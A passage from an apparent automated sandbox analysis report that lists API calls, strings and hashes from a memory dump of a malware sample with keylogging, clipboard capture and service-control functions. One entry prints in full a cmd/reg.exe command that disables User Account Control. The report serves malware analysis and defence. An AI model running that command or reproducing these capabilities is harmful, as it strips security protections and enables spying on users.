                                                          • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                          Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                          • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                          • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                          • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                          Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                          • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                          • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                          • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                          Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                          • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                          • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                          • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                          Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]$DG
                                                          • API String ID: 3554306468-1089238109
                                                          • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                          • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                          • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                          • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                          Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                          • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                          • API String ID: 2974294136-753205382
                                                          • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                          • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                          • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                          • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                          Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                          • wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                          • API String ID: 1497725170-248792730
                                                          • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                          • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                          • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                          • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                          Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                          • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID: `AG
                                                          • API String ID: 1958988193-3058481221
                                                          • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                          • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                          • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                          • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                          Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                          • GetLastError.KERNEL32 ref: 0041CA91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                          • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                          • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                          • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                          Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                          • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                          • CloseHandle.KERNEL32(?), ref: 00406A14
                                                          Strings
                                                          • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                          • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                          • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                          • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                          Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                          • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                          • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                          • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                          Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                          • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                          • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                          • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                          Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                          Strings
                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                          • API String ID: 3024135584-2418719853
                                                          • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                          • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                          • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                          • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                          Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetCursorInfo$User32.dll$`#v
                                                          • API String ID: 1646373207-1032071883
                                                          • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                          • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                          • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                          • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                          Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                          • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                          • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                          • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                          Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                          • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                          • String ID:
                                                          • API String ID: 3525466593-0
                                                          • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                          • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                          • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                          • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                          Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                            • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 4269425633-0
                                                          • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                          • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                          • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                          • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                          Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                          • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                          • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                          • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                          Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                          • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                          • __freea.LIBCMT ref: 0044FFC4
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                          • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                          • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                          • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                          Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                          • _free.LIBCMT ref: 0044E1A0
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                          Memory Dump Source
